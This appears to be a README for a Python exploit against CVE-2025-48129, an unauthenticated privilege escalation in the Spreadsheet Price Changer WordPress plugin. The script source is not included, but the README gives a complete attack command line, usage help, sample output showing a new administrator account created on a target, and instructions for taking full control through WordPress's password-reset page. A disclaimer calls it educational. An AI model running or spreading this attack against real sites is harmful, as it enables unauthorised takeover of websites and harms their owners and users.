# 🚨 CVE-2025-48129 - Privilege Escalation in WordPress Spreadsheet Price Changer Plugin

## 🛡️ Vulnerability Summary

- **Plugin Affected**: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
- **Vulnerable Versions**: `<= 2.4.37`
- **Patched Version**: ❌ *No official fix available*
- **Discovered By**: Patchstack | 20 May 2025
- **CVE ID**: `CVE-2025-48129`
- **CVSS Score**: `9.8 (Critical)`
- **Patch Priority**: 🔴 High

## 🔥 Risk

Unauthenticated attackers can escalate privileges by creating an Administrator-level account without needing any prior access. This allows complete takeover of the WordPress site.

> Classified under: **OWASP A7 – Identification and Authentication Failures**

---

## 🧪 Exploit Script Overview

This Python script targets vulnerable versions of the plugin and registers a new WordPress Administrator using only an email and password (hashed via MD5).

---

### ▶️ Example Usage

```bash
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail NxploitBot@gmail.com -p nxploitadmin
```

---

### 📘 Usage Help

```bash
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)
```

---

### ✅ Successful Output Example

```
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: NxploitBot@gmail.com
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword
```

---

## ⚠️ Important Note

In some cases, logging in directly with the chosen password may fail.  
This is **not a bug in the exploit**, but a result of how the vulnerable plugin passes hashed passwords to WordPress’s internal user creation system.

If you’re unable to log in, **simply reset the password via email** using the following URL:

```
http://target-site.com/wordpress/wp-login.php?action=lostpassword
```

WordPress will send a password reset email to the Admin account you just created — granting you full access.

---

## 🧾 Legal Disclaimer

This tool is provided for educational and authorized penetration testing purposes only.  
The author assumes no responsibility for misuse or damage caused by this script.

---

*By: Nxploited ( Khaled_alenazi )*
